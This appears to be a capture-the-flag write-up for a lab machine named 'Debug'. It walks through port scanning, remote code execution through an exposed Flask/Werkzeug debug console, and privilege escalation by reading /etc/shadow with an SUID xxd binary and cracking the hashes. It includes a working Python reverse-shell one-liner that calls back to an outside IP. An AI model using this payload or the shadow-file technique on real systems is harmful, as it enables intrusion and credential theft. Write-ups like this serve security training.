Debug

nmap

mkdir nmap
sudo rustscan -a 172.31.1.5 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

Web service is open on port 80

Let's check the website in the browser.

Web enumeration

After some time of exploration of the web pages, I noticed this website is running Flask, and werkzueg debug tool is enabled.

Exploitation

We can easily get a reverse shell since the pin code of Werkzueg is not enabled and we can execute any python command. To do that, first set a reverse shell listener.

Craft your favorite reverse shell payload, but in this case, I would use Python.

os.system('python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.41",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\'')

Proceed to Werkzueg debugger, spawn an interactive python interpreter and execute the following.

You should receive your shell right away.

Post Exploitation

First, let's transfer linpeas.sh from our machine to the target machine

You can find the machine IP address by executing the following.

Then transfer the script using wget

And run linpeas.sh

After quite some time running, you will notice the xxd binary has SUID set

We can read /etc/shadow by using this binary. Execute the following to do so

Copy the output to your local machine, and throw these hashes with john. After a few seconds, you will get the root password.

Run su root to log in as root.

Thanks for reading, and enjoy the rest of your day! :D